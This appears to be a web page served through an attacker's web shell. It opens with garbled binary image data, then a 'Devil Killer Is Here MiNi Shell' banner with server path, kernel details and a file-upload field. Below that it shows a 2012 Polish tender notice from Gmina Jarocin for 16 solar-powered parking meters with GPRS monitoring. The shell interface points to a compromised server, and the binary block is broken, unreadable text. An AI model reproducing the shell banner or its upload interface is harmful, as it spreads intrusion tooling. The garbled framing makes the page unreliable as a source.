JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120322/90582-N-2012.html

<p class="kh_header"><b>Jarocin: Dostawa, montaż, uruchomienie i serwis urządzeń poboru opłat za postój w mieście Jarocin</b><br>
<b>Numer ogłoszenia: 90582 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 62 7499500, faks 62 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż, uruchomienie i serwis urządzeń poboru opłat za postój w mieście Jarocin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż, uruchomienie i serwis gwarancyjny oraz bieżąca eksploatacja w okresie gwarancji 16 szt. urządzeń poboru opłat na drogach publicznych w mieście Jarocin w wyznaczonej strefie, w której dopuszcza się pobieranie opłat za parkowanie samochodów, wraz z wyposażeniem dodatkowym tj.:
1. Sprzęt komputerowy z oprogramowaniem dla biura strefy parkowania:
a)	2x Stacja robocza:
b)	Oprogramowanie dla stacji roboczej:
c)	Monitory:
d)	Drukarka:
e)	Notebook:
f)	Oprogramowanie dla notebook:
g)	Serwer:
h)	Oprogramowanie Serwera:
i)	Sieć:
2.	300 szt. kart elektronicznych wielokrotnego ładowania o nominale 50 zł. z chipem nadrukiem ( wzór nadruku ustali Zamawiający)
3.	2 szt. ładowarek do kart elektronicznych
4.	2 szt. przenośnych terminali dla kontrolerów
5.	2 szt. drukarka terminala mobilnego
6.	1 szt. urządzenie do laminowania kart abonamentowych 
7.	3 kasety monetowe - rezerwowe
8.	3 akumulatory - rezerwowe.

Urządzenia do poboru opłat muszą spełniać następujące wymagania techniczno - eksploatacyjne:
1)	Fabrycznie nowe urządzenie do pobierania opłat parkingowych którego jedna zwarta nie rozkładana obudowa składa się z części technicznej i kasowej oddzielonych od siebie, 
z osobnymi drzwiami . Dostęp do części technicznej i kasowej powinien być zabezpieczony za pomocą oddzielnych drzwi zamykanych zamkami indywidualnymi różnych typów (rodzajów), odpornymi na włamanie za pomocą wytrychów i wiercenia.
2)	W przypadku gdy drzwi są otwarte nie powinno być możliwe wyjęcie klucza z zamka.
3)	Urządzenie musi być wykonane ze stali nierdzewnej 1.4301 (grubość minimum 2 mm), kwasoodpornej odpornej na korozję lub z materiałów nie ulegających korozji przez min. 6 lat. Konstrukcja części kasowej powinna zapewniać zabezpieczenia monet blachę nierdzewną o łącznej grubości min 3,0 mm. Kolor pomarańczowy, RAL 2004. Konstrukcja urządzenia i zastosowane materiały muszą zapewniać odpowiednią odporność na uszkodzenia mechaniczne (wandalizm). Urządzenie musi pracować niezawodnie w zakresie temperatur od -20 stopni Celsjusza  do +55 stopni Celsjusza  przy wilgotności względnej do 95 %. Wspólny wylot ( przedział odbioru ) na bilety i zwrot monet o szerokości pozwalającej na swobodne włożenie dłoni tj. min. 100 mm.
4)	W celu zapewnienia właściwej obsługi urządzenia i estetyki jego wymiary nie powinny być większe niż: wysokość x szerokość x głębokość: 1700 mm x 370 mm x 280 mm.
5)	Działanie urządzenia parkingowego zgodne   ze standardem PN- EN 12414:2002.
6)	Urządzenie powinno być zasilane autonomicznym układem złożonym z baterii słonecznej o mocy nominalnej min. 10W i akumulatora min. 75 Ah doładowywanego w sposób ciągły przez tę baterię. Moc baterii słonecznej oraz pojemność akumulatora powinna być dobrana w taki sposób aby zapewnić nieprzerwane działanie urządzenia w okresie co najmniej 5 miesięcy. Bateria słoneczna winna być zintegrowana z obudową urządzenia do pobierania opłat parkingowych, odporna na uszkodzenia mechaniczne oraz warunki atmosferyczne, łatwa do czyszczenia.
7)	Sygnalizacja poprzez GSM-GPRS (do centrum sterowania) zbyt niskiego poziomu zasilania i odpowiednie zabezpieczenia przed wykasowaniem danych z pamięci wewnętrznej w każdym wypadku zaniku zasilania.
8)	Odpowiednie do wyglądu obudowy oznakowanie informujące o możliwości zakupu biletów parkingowych uzgodnione z zamawiającym. Należy uwzględnić możliwość wyboru koloru obudowy przez Zamawiającego. Obudowa urządzenia pomalowana farbą odporną na graffiti. Pomocna dla użytkowników instrukcja obsługi według projektu zamawiającego. Zamawiający wymaga, by na wyświetlaczu-wyświetlaczach pojawiały się informacje dotyczące:
-	sprawności urządzenia (czynny - nieczynny-, płatny tylko kartą lub monetami w razie uszkodzenia jednego z elementów),
-	aktualnego czasu (zegar),
-	aktualnej daty,
-	wysokość opłaty (taryfa), 
- lokalizacji urządzenia.
Dla   ww   informacji   wymagany   wyświetlacz   graficzny   minimum    40 znaków oraz informacje o wysokości taryf uzgodnione z zamawiającym lub teksty reklamowe. Dla powyższej informacji wymagany wyświetlacz graficzny minimum 80 znaków.
9)	Powyższe informacje powinny dać się uzyskać na wyświetlaczu-wyświetlaczach w co najmniej trzech dowolnie programowanych językach (polski, angielski, niemiecki), które w każdej chwili można zmieniać. Wyboru języka innego niż polski ma dokonywać użytkownik poprzez użycie określonego przycisku.
10)	Wyboru zmiany taryfy podstref cenowych ma dokonywać użytkownik poprzez użycie oddzielnego przycisku. Po dokonaniu transakcji automatyczny powrót do taryfy obowiązującej przed zmianą. Łatwa dostępność dla użytkowników przez bezpośrednie przyporządkowanie objaśnień tekstowych i graficznych do poszczególnych przycisków obsługowych. Możliwości przerwania transakcji i zwrot opłaty bez wydania biletu.
11)	Wyświetlacz (lub wyświetlacze)z materiału odpornego na uszkodzenia oraz łatwego do konserwacji. Na wyświetlaczu (wyświetlaczach) muszą pojawić się wszystkie komunikaty (uzgodnione z zamawiającym - w języku polskim - z polskimi czcionkami).
12)	Sprzedaż biletów parkingowych za gotówkę (bilon) oraz bezgotówkowe uiszczanie wpłat za pomocą karty chipowej wg ISO 7816 bez możliwości wydawania reszty przez urządzenie do pobierania opłat parkingowych. Zamawiający wymaga, by opłata za parkowanie była wnoszona z góry. Przy skróceniu czasu parkowania zamawiający nie przewiduje zwrotu należności. Na wydanym bilecie parkingowym muszą   znajdować się następujące informacje: dane identyfikujące urządzenie do pobierania opłaty parkingowej (ulica, nr. urządzenia, strefa cenowa), data, godzina i minuta wydania oraz upływu ważności biletu, kolejny numer biletu, wysokość wniesionej opłaty, bilet powinien posiadać kod unikatowy lub inne zabezpieczenie przed fałszowaniem, inne informacje uzgodnione z zamawiającym, numer rejestracyjny pojazdu wprowadzany z klawiatury.
13)	Urządzenie powinno wydrukować bilet w czasie nie dłuższym niż 3 sec. od momentu zaakceptowania transakcji przez użytkownika. Wymiary biletu: długość min. 65 mm. Szerokość min 55 mm. Długość rolki z papierem powinna wynosić min. 350 m tj ok. 4500 biletów. Na bilecie powinna być możliwość wydruku znaków graficznych ( logo bezpośrednio z drukarki.
14)	Urządzenie parkingowe powinno posiadać możliwość doposażenia w klawiaturę alfanumeryczną pozwalającą na wprowadzenie i drukowanie na bilecie numeru rejestracyjnego pojazdu.
15)	Urządzenie powinno posiadać możliwość sprawdzenia przez serwis żetonem lub kartą serwisową i wydruku biletu serwisowego z zaznaczeniem na bilecie rodzaju biletu i formy płatności ( żeton lub karta ).
16)	Obsługa urządzenia za pomocą przycisków piezoelektrycznych . Użytkownik powinien mieć możliwość przerwania transakcji w dowolnym momencie. Wybór taryfy i języka obsługi osobnym przyciskiem.
17)	Otwór wrzutowy na monety powinien znajdować się po prawej stronie urządzenia w celu zapewnienia ergonomicznej obsługi przez większość użytkowników. Otwór wrzutowy na monety powinien być zabezpieczony blokadą która otwiera się tylko pod wpływem zbliżenia monety.
18)	Dodatkowo w przypadku zatkania otworu wrzutowego automat powinien informować na wyświetlaczu ( wyświetlaczach) o możliwości zapłaty kartą lub niesprawności urządzenia. W przypadku zatkania otworu wrzutowego urządzenie powinno mieć mechanizm automatycznie oczyszczający otwór wrzutowy.
19)	Urządzenie powinno mieć możliwość wydrukowania biletu podstawowego umieszczanego za szybą pojazdu wraz z potwierdzeniem dla kierowcy połączonym z biletem podstawowym i przeciętym do połowy.
20)	Na potwierdzeniu powinny się znaleźć następujące informacje:
-  wysokość wniesionej opłaty,
-  czas ważności biletu,
- nazwa i lokalizacji urządzenia parkingowego i dodatkowo min. 12 znaków definiowanych przez Zamawiającego.
21)	Drukarka termiczna, określenie temperaturowe od -20 C do + 55 C odporna na wstrząsy. Po wydrukowaniu biletu , gilotyna drukarki powinna równo obcinać bilet.
22)	Sygnalizacja serwisowa dotycząca braku papieru jak również innych usterek przekazywana do centrum sterowania.
23)	Elektroniczny kontroler autentyczności monet (dopuszczalny błąd poniżej 1 %) z programowalną blokadą otworu wrzutowego z dowolnym programowaniem dla różnych rodzajów monet. Powyżej dopuszczalnego błędu wymagane jest ponowne ustawienie na koszt wykonawcy.
24)	Czytnik monet powinien mieć możliwość obsługi min. 16 rodzajów monet w tym monety testowej, przeznaczonej dla serwisu i pozwalającej na wydrukowanie biletu testowego.
25)	Czytniki monet powinien obsługiwać monety lOgr. 20gr 50gr. 1 zł. 2 zł i 5 zł z możliwością zaprogramowania monet EUR.
26)	Czytnik kart chipowych wg ISO 7816.
27)	Samozamykająca się zabezpieczona część kasowa na monety o pojemności od 4 do 6 litrów.
28)	Opróżnienie części kasowej winno automatycznie uruchamiać drukowanie raportu danych statystycznych na drukarce urządzenia z numeracją kolejną umożliwiającą identyfikację urządzenia. Uruchomić drukowanie raportu zawierającego nr raportu, nr urządzenia, ulicę , datę, godzinę stan kasy - bilon, liczbę i rodzaje monet oraz te same dane dotyczących płatności kartą . Wszystkie dane muszą być przekazane elektronicznie poprzez GSM-GPRS do centrum sterowania. Dodatkowo wymagany sejf grubości min. 6 mm spełniający normę bezpieczeństwa S2 zgodnie z EN 14450.
29)	Selektywny wybór meldunków serwisowych pod wskazany numer telefonu np. biuro i ochrona.
30)	Transmisja danych poprzez GSM-GPRS
31)	Aplikacja kliencka, realizująca dostęp do danych gromadzonych w bazie danych SQL w Centrum Zarządzania i Przetwarzania Danych powinna pobierać dane z serwera przez szyfrowany tunel VPN (algorytm AES 256) i powinna być zabezpieczoną dodatkowo kluczem sprzętowy USB.
32)	Wyciągnięcie klucza sprzętowego USB uniemożliwia osobom nieupoważnionym dostęp do aplikacji.
33)	Zbieranie i przekazywanie wszystkich danych elektronicznie poprzez GSM-GPRS do BSPP. wpływy finansowe: wartość sprzedanych biletów w okresie poprzedzającym opróżnienie części kasowej lub poprzedzającym odczyt(w rozbiciu na dni - 5 opróżnień części kasowej), wartości opłat wniesionych monetami i kartami stykowymi - bezstykowymi, wartość monet znajdujących się w części kasowej.
34)	Wymagany monitoring wpływów finansowych do urządzenia poboru opłat,
35)	informacja o transakcjach dokonanych w parkomacie.
36)	informacja o ilości sprzedanych biletów w zależności od ich wartości.
37)	statystyka parkowania: liczba biletów opłaconych monetami, liczba biletów opłaconych kartami, liczba biletów zakupionych na określony czas parkowania, generowanie wykresów ilości sprzedaży biletów w zależności od pory dnia.
38)	monitorowanie pracy urządzenia: data i godzina wystąpienia awarii, data i godzina usunięcia awarii, rodzaj awarii, czas niesprawności. Wymagany monitoring sprawności urządzenia, generowanie wykresu stanu naładowania akumulatora.
39)	informacja o procentowym napełnieniu części kasowej od 75 %.

Oprogramowanie monitorujące:
1)	powinno posiadać mapę miasta zaznaczoną lokalizacją poszczególnych urządzeń parkingowych z sygnalizacją kolorami stanu technicznego i kasowego urządzenia 
(informacja o konieczności wyjęcia kasetki z bilonem).
2)	Łączność GSM-GPRS powinna być dwustronna tzn. urządzenia parkingowe łączą się z biurem i w każdej chwili można się połączyć z biura z dowolnym urządzeniem parkingowym.
3)	Automatyczna zmiana czasu z letniego na zimowy i odwrotnie.
4)	Zaprogramowania obowiązującego cennika opłat i napisów informacyjnych w dniu odbioru oraz świąt stałych i ruchomych przez wykonawcę. Zapewnienie automatycznego przestawiania (przestawianie zdalne przez komputer centralny i GSMGPRS).
5)	Dowolnie programowana zmiana wysokości opłat do wyboru:
a)	bezpośrednio z urządzenia przenośnego przy urządzeniu do pobierania opłat parkingowych lub karty chipowej.
b)	przez sterowanie drogą GSM-GPRS z centrum sterowania do urządzenia do pobierania opłat parkingowych. - Łatwo wymienialne przez przeszkolonego pracownika zamawiającego etykiety z informacjami o stawkach opłat parkingowych i instrukcje obsług zabezpieczone przejrzystym ekranem z tworzywa sztucznego według projektu zamawiającego.

Wszystkie w-w urządzenia muszą być fabrycznie nowe.
Lokalizacja montażu urządzeń poboru opłat na drogach publicznych w mieście Jarocin wskazana została w załączniku nr 6 do SIWZ. 

Dostawę, montaż i uruchomienie urządzeń poboru opłat oraz urządzeń dodatkowych będących wyposażeniem Biura Strefy Płatnego Parkowania wraz z oprogramowaniem 
i próbnym rozruchem należy wykonać do dnia 30.04.2012 r.

Dodatkowo Wykonawca zobowiązany jest przeprowadzić szkolenie pracowników Zamawiającego w stopniu umożliwiającym prowadzenie biura strefy płatnego parkowania wraz z obsługą parkomatów.

Serwis gwarancyjny i bieżącej eksploatacji wszystkich dostarczonych urządzeń należy prowadzić przez cały okres gwarancji, którą ustala się na 36 miesięcy licząc od dnia rozpoczęcia pobierania opłat za pomocą tych urządzeń tj. od dnia 01.05.2012 r.

W przypadku gdy dokumentacja bądź inne dokumenty zawierają nazwę producenta danego wyrobu, materiału itp. - Zamawiający w każdym przypadku dopuszcza możliwość zastosowania produktów, materiałów itp. równoważnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.73.00.00-1, 51.21.40.00-5, 45.26.22.10-6, 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie:
a)	minimum 2 dostawy po 15 parkomatów współpracujących z centrum kontroli 
i monitoringu poprzez GSM lub GPRS,
b)	minimum 2 usługi  polegające na serwisowaniu systemu min. 15 parkomatów współpracujących z centrum kontroli i monitoringu poprzez system GSM lub GPRS oraz obsługujących monety i kartę elektroniczną</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże,  że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej prawidłowe wykonanie przedmiotu zamówienia poprzez przedstawienie informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej posiadanie środków finansowych lub zdolność kredytową Wykonawcy w wysokości 400.000,00 PLN;
Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień wystawienia dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. 2010, Nr 113, poz. 759 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy 
w stosunku do treści oferty w następujących przypadkach:
1)	dopuszczalna jest zmiana umowy polegająca na zmianie osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za przedmiot zamówienia - Wykonawca może zmienić te osoby z przyczyn niezależnych od niego, tj. zdarzeń losowych (śmierć, choroba, zwolnienie) oraz innych przyczyn niezależnych od wykonawcy (np. rezygnacji z powodu niewywiązywania się tych osób z należytego wykonywania przedmiotu zamówienia); warunkiem dopuszczenia nowych osób do realizacji zamówienia w ramach niniejszej umowy jest akceptacja Zamawiającego, 
2)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku gdy ulegną zmianie powszechnie obowiązujące przepisy 
w zakresie wysokości stawki podatku VAT na przedmiot świadczenia.;
3)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy),
4)	dopuszczalne są zmiany postanowień umowy, które wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego,
5)	dopuszczalna jest zmiana numeru rachunku bankowego wykonawcy, podanego 
w umowie, w przypadku zmiany rachunku bankowego wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia,
6)	dopuszczalna jest zmiana umowy w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
7)	dopuszczalna jest zmiana umowy polegająca na zmianach technicznych o ile są one dla Zamawiającego korzystne i obiektywnie uzasadnione.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarocińskiego Funduszu Poręczeń Kredytowych Sp. z o.o.
ul. T. Kościuszki 15B
63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 09:00, miejsce: Urząd Miejski w Jarocinie
Al. Niepodległości 10, pok. 32 (sekretariat)
63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





